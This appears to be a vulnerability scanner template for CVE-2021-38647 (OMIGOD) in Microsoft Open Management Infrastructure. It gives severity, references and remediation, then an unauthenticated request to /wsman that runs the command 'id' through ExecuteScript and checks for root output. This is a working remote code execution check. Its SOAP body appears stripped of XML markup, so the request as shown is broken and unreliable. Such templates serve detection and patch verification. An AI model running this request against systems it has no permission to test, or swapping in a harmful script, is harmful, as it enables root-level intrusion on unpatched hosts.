id: CVE-2021-38647 info: name: Microsoft Open Management Infrastructure - Remote Code Execution author: daffainfo,xstp severity: critical description: Microsoft Open Management Infrastructure is susceptible to remote code execution (OMIGOD). impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code with SYSTEM privileges. remediation: Updates for this vulnerability were published on GitHub on August 11, 2021. reference: - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647 - https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647 - https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/ - https://github.com/microsoft/omi classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-38647 cwe-id: CWE-287 epss-score: 0.97476 epss-percentile: 0.99967 cpe: cpe:2.3:a:microsoft:azure_automation_state_configuration:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: microsoft product: azure_automation_state_configuration tags: cve2021,cve,rce,omi,microsoft,kev http: - raw: - | POST /wsman HTTP/1.1 Host: {{Hostname}} Content-Type: application/soap+xml;charset=UTF-8 HTTP://{{Hostname}}/wsman/ http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript 102400 uuid:00B60932-CC01-0005-0000-000000010000 PT1M30S root/scx aWQ= 0 true matchers: - type: word words: - '' - 'uid=0(root) gid=0(root) groups=0' condition: and # digest: 490a00463044022075766ea7d42285a510f8cf5bbf152b2127b7ddd4e45ac1ffa62fd966e454bda302202136133cbcfdff83d89b7a884f9f17c89e4148e08ad866458c74a811d4f48201:922c64590222798bb761d5b6d8e72950